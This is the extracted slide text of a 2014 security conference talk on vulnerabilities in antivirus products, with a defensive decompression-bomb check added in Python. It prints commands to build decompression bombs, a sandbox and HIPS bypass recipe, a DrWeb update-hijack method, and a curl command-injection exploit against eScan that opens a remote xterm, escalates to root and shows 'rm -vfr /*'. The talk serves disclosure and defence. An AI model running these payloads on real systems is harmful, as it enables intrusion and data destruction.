
Breaking Antivirus Software. Joxean Koret, COSEINC. 44CON, 2014.


Available for your exploiting pleasure at the fixed addresses 0x10000000 in x86 and 0x18000000000 in AMD64.

Comodo Internet Security
It actually means Comodo Internet Security users are vulnerable to exploitation.

Koret is correct and your product sucks hard. Thanks for playing!

AV developers writing security software
Remote Denial of Service Examples: ClamAV DoS
There was a bug in ClamAV scanning icon resource

–  –  –

Found via dumb ass fuzzing.

 Reported. Because it's Open Source...

https://bugzilla.clamav.net/show_bug.cgi?id=10650
The vulnerability was nicely handled by the ClamAV team (now Cisco).

Decompression bombs (multiple AVs)
Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001.

A compressed file with many compressed files 

–  –  –

* Sophos finishes after ~30 seconds, on a “testing” machine with 16 logical CPUs and 32 GB of RAM.

** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one.

*** In my latest testing, ESET finishes after 1 minute with each file on my “small testing machine”.

**** Sometimes, it seems to time out after 5 minutes on Windows.

Decompression bombs: How to
To create a simple decompression bomb in Unix, issue the following commands:

$ truncate -s 8589934592 dumb # 8GB
$ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb

That's all. The result file is always less than 10 MB.
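The defender-side counterpart to the procedure above, added here as an example and not code from the slides: a Python guard that refuses to inflate an archive whose declared sizes or actual inflated output exceed a budget, which is exactly the check the engines in the table above were missing. The budget values, file names and sample inputs are assumptions constructed for the example.

```python
"""Decompression-bomb guard (added example, not from the slides): a cheap
pre-check on the sizes declared in the zip central directory, then a hard
byte budget enforced while inflating, because declared sizes can lie.
Budget values are assumptions, not figures from the slides."""
import io
import zipfile

MAX_TOTAL_UNCOMPRESSED = 64 * 1024 * 1024  # 64 MiB of output per archive
MAX_RATIO = 100                             # declared uncompressed:compressed

class BombSuspected(Exception):
    """Raised as soon as an archive looks like a decompression bomb."""

def check_declared(zf: zipfile.ZipFile) -> None:
    """Pre-check using only the (untrusted) central-directory sizes."""
    infos = zf.infolist()
    total_unc = sum(i.file_size for i in infos)
    total_comp = sum(i.compress_size for i in infos) or 1
    if total_unc > MAX_TOTAL_UNCOMPRESSED:
        raise BombSuspected(f"declared {total_unc} bytes exceeds budget")
    if total_unc / total_comp > MAX_RATIO:
        raise BombSuspected(f"declared ratio {total_unc // total_comp}:1")

def scan_archive(data: bytes, chunk: int = 64 * 1024) -> int:
    """Inflate every member under a byte budget; return bytes produced."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        check_declared(zf)
        produced = 0
        for info in zf.infolist():
            with zf.open(info) as member:
                while buf := member.read(chunk):
                    produced += len(buf)
                    if produced > MAX_TOTAL_UNCOMPRESSED:
                        # The declared sizes lied; stop inflating now.
                        raise BombSuspected("inflated output exceeded budget")
                    # buf would be handed to the real content scanner here
        return produced

def verdict(data: bytes) -> str:
    """Scanner-facing wrapper: 'ok (...)' or 'bomb suspected: ...'."""
    try:
        return f"ok ({scan_archive(data)} bytes inflated)"
    except BombSuspected as exc:
        return f"bomb suspected: {exc}"

def make_archive(name: str, payload: bytes) -> bytes:
    """Build a deflate-compressed zip in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()

# Constructed samples: 16 MiB of zeros deflates roughly 1000:1, like the
# slides' "dumb" file; 1 KiB of varied bytes barely compresses at all.
BOMB = make_archive("dumb", b"\0" * (16 * 1024 * 1024))
BENIGN = make_archive("readme.bin", bytes(range(256)) * 4)
```

The streaming budget is the part that matters for a scanner: the central directory is attacker-controlled, so the pre-check only saves work, and the byte counter in `scan_archive` is what bounds disk and memory use.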

I couldn't believe that antivirus engines still fail at this trivial “attack” nowadays when I “discovered” this...

Notes about decompression bombs
These bugs are not a big deal. I know.

 However, they can be used like in the following 

–  –  –

It seems nobody cares about this bug.

Also, some companies are really funny:

http://www.cio.co.nz/article/551276/antivirus_products_riddled_security_flaws_researcher_says/

BitDefender engine
BitDefender is a Romanian antivirus engine.

 Their AV core is the most widely distributed AV 

–  –  –

LavaSoft, Immunet, QiHoo 360,...

It suffers from a number of vulnerabilities, as do almost all other AV engines/products out there.

Finding vulnerabilities in this engine is trivial.

–  –  –

(Vulnerability fixed) Modifying 2 DWORDs in a PE file packed with the Shrinker3 packer used to crash it:

Those bytes were used to calculate the file and section alignment of the new, in-memory, unpacked PE file.

When set to 0xFFFFFFFF and 0xFFFFFFF, both file and section alignment were set to 0...

BitDefender bugs
...and their values were used, later on, in some arithmetic operations:

Those 2 bugs were trivial to discover. But they failed to find them by themselves...

One more complex BitDefender bug...

(Vulnerability fixed?) Modifying a single byte in a Thinstall installer would make it crash:

After modifying one byte, the decompressed content would get corrupted. An index into a table was calculated from the corrupted content... and data likely controlled by the attacker was copied to a position that was also likely controllable.

Again: this bug was trivial to discover. TRIVIAL.

BitDefender notes
This and all of BitDefender's bugs don't affect BitDefender's products exclusively.

They affect many AV products out there, as previously mentioned.

Adding a new AV engine to your product may sound “cool”, but you're making 3rd-party bugs yours.

And, by the way, you didn't audit it before 

–  –  –

ESET Nod32 is a well-known Slovak AV engine.

Like many other AV engines, it suffers from a number of vulnerabilities that can be trivially discovered.

One little example: a malformed PDF file.

–  –  –

They talk in their blog post (http://x90.es/comodofail) about their sandboxed processes.

They only sandbox processes in Windows, not in Unix.

–  –  –

most AV products out there, no matter what they say.

Comodo example vulnerability
I have ~9 bugs in their parsers discovered with my fuzzers (1 instance, 1 week).

Almost any malformed OLE2 container (i.e., a Word document) can make it crash.

Let's see an example bug:

–  –  –

Very hard, isn't it?

BTW, remember: the AV scanning processes don't run sandboxed in Linux.

“Security enhanced” software
Some AV suites come with various other software programs that are installed by default.

The most typical examples:

–  –  –

Rising is an anti-virus company from China.

Summary: no ASLR-enabled library at all.

 Also, the AV product installs one “security enhanced” 

–  –  –

Everything runs with “Medium” integrity level and there are 6 libraries without ASLR enabled.

Isn't it cool?

Advice to users of this Rising installed browser:


Security enhanced products...

But, as is common with AV suites, this is not 

–  –  –

Kingsoft distributes, with the AV installer, a “security enhanced browser” called Liebao (cheetah in Chinese).

It's installed by default with the AV.

 Also, set as the default browser.

 This browser is exploiter's heaven and they fail 

–  –  –

...or the lack thereof. Proof:

 For users of Liebao: DO NOT USE IT.

More AV developers writing security software
Extra about Kingsoft
Also, they install a piece of adware. Yes, your AV product. It's called NaviNow.

It's from a Japanese company with the same name.

–  –  –

Nevertheless, an AV product is installing adware for you. Very cool...

My Sandbox is Unbreakable (TM)
Talking about sandboxes...

Some AV products, like BKAV or Comodo Internet Security, as we have seen previously, are good targets for writing targeted exploits against their users because they install a library without ASLR system-wide.

But, what is this library for?

–  –  –

Let's take a closer look at one sandbox...

 Or something similar, they said...

Comodo Internet Security
Kevin J. Judge, in Comodo's blog post, used my research to promote their product, as previously mentioned... didn't I? :)

He talks a lot about the sandbox of the product and the protection it gives and bla, bla, bla...

I did check the HIPS and, partially, the true sandbox they use to run untrusted applications.

The HIPS for ~2 hours (considering the installation 

–  –  –

Let's see the results...

HIPS/sandbox bypass demo
Let's see the black magic behind this...

But, be warned!

You have been warned...

Comodo Internet Security's HIPS
Their sandbox (partially) and HIPS system (completely) are implemented as user-land libraries (BTW, the HIPS one is without ASLR) injected system-wide:

Guard32/64.dll for the HIPS. Cmdvirt32/64.dll for the sandbox.

The libraries simply hook some user-land functions like CreateFile, CreateProcess, etc., using madCodeHook (a genuine work of non-Comodo people).

It was a good enough technology 10 years ago.

 I wonder if they patented user-land hooks. Just curious...

The obvious attack:

Call FreeLibrary(GetModuleHandle(“guard32.dll”)) from inside the monitored process.


Comodo Internet Security's Sandbox
On the 1st try I received error 5, “Access denied”.

Then, I decided to attach a debugger and see what happens.

They are also hooking ntdll!LdrUnloadDll, from the very same library. That's all.

Final try: change the page protections of ntdll, patch the function LdrUnloadDll so the hook is removed, reset the page protections and call FreeLibrary.

Guess what? It works.

Comodo Internet Security
So far I only bypassed the “Partially limited”, “Limited” and “Restricted” levels of the HIPS (according to the GUI this is part of the sandbox, but it is not... anyway).

It took me 1 hour.

–  –  –

DrWeb is a Russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex), plus the Duma, to name a few customers.

More of their propaganda (the original web page I got this information from has been inaccessible since I disclosed just 1 vulnerability during SyScan 2014 Singapore):

DrWeb updating protocol
DrWeb used (still does it?) to update via HTTP only. They do not use SSL/TLS.

It used to download a catalog file first:

–  –  –

was signed, even the DrWeb32.dll library.

DrWeb updating protocol
The “highest grade of certificate from the government” used to require the highest grade of checking for their virus database files and antivirus libraries: CRC32. Lol.

To exploit it in a LAN, intercepting these domains was enough:

–  –  –

...and replacing drweb32.dll with your “modified” (lzma'ed) version.

DrWeb updating protocol
Exploiting it was rather easy with ettercap and a quick Python web server + the Unix lzma tool.

You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file.

I tested the bug under Linux: full code execution is 

–  –  –

One Russian guy wrote a Metasploit exploit for

http://habrahabr.ru/post/220113/

In my opinion, this updating protocol (is?) was horrible.

DrWeb updating protocol vulnerability
The vulnerability was fixed and “an alert” issued.

In the “alert” they do not say they fixed a vulnerability.

http://news.drweb.com/?i=4372&c=5&lng=ru&p=0

–  –  –

and, I think, Chinese.

They only said that changes were made to increase the security of the update procedure.

Technically true: From no security to some security.

 I did not research the update. It can be fun as I'm 99% 

–  –  –

that the eScan product has a Linux version.

I downloaded and installed it (~1 hour because of the awful hotel connection).

Then I started checking what it installs, looking for SUID binaries, etc...

They use BitDefender and ClamAV engines, they don't have 

–  –  –

mwconf (created during installation).

The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... It was fixed recently.

A command injection in the login form (PHP).

–  –  –

what not to do or how to write easy exploits, as a tutorial.

The user name and the password were used to construct an operating system command executed via PHP's function “exec”.

I was not able to inject in the user name.

–  –  –

Source code of login.php (I)
Source code of login.php (II)
The password sent by the user was passed to

There were some very basic checks against the

–  –  –

But they forgot various other characters like ';'.

Source code of common_functions.php
Then, the given password was used in the

–  –  –

My super-ultra-very-txupi-complex exploit for it:

$ xhost +
$ export TARGET=http://target:10080
$ curl --data "product=1&uname=valid@user.com&pass=1234567;DISPLAY=YOURIP:0;xterm;" $TARGET/login.php

Once you're in, run this to escalate privileges:

$ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm

Or anything else you want...

$ /opt/MicroWorld/sbin/runasroot rm -vfr /*

Breaking antivirus software
Introduction / Attacking antivirus engines / Finding vulnerabilities / Exploiting antivirus engines / Antivirus vulnerabilities / Conclusions

–  –  –

...make you more vulnerable to skilled attackers.

...are as vulnerable to attacks as any other application.

 Some AV software...

...may lower your operating system protections.

...are plagued of both local and remote vulnerabilities.

 Some AV companies...

...don't give a fuck about security in their products.

Breaking antivirus software
Introduction / Attacking antivirus engines / Finding vulnerabilities / Exploiting antivirus engines / Antivirus vulnerabilities / Conclusions / Recommendations

Recommendations for AV users
Do not blindly trust your AV product.

–  –  –

Isolate the machines with AV engines used for gateways, network inspection, etc...

Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.

Recommendations for AV companies
Audit your products: source code reviews & fuzzing.

–  –  –

Internal code audits are good. 3rd party ones are awesome.

Do not use the highest privileges possible for scanning network packets, files, etc...

You don't need to be root/system to scan a network packet 

–  –  –

privileged or sandboxed, process.

Recommendations for AV companies
Run dangerous code under an emulator, a VM or, at the very least, in a sandbox. I only know of 3 AVs using this approach.

The file parsers written in C/C++ code are very dangerous.

–  –  –

I'm talking about your AV's running processes.

Recommendations for AV companies
Do not use plain HTTP for updating your

–  –  –

...and verify there is nothing else after the signature.

 Also, verify the whole certification chain...

Recommendations for AV companies
Drop old code that is of no use today, or make this code not available by default.

Code for MS-DOS era viruses, packers, protectors, 

–  –  –

unsupported products nowadays.

Such old code not touched in years is likely to have vulnerabilities.

Ignore any antivirus comparative company asking you to detect malware from the Jurassic era. Avoid them.

Special for Comodo and some other AV(s)...

Recommendations for AV companies
This research is not meant to instruct users not to install AV products.

This research is meant to highlight the typical problems in AV products and push the industry to actually write secure security software.

Reporting bugs responsibly would not make 

–  –  –

antivirus software.

Then see the dates and what changed.

Recommendations for AV companies
Also, do not write blog posts demonizing researchers or manipulating their words in order to promote your products.

Just a friendly recommendation.

Also, never say anything that can be understood as “Hackers can't own my product”.
